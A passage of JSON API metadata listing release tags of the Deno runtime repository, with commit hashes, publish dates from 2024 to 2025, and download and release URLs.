sts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca13207460720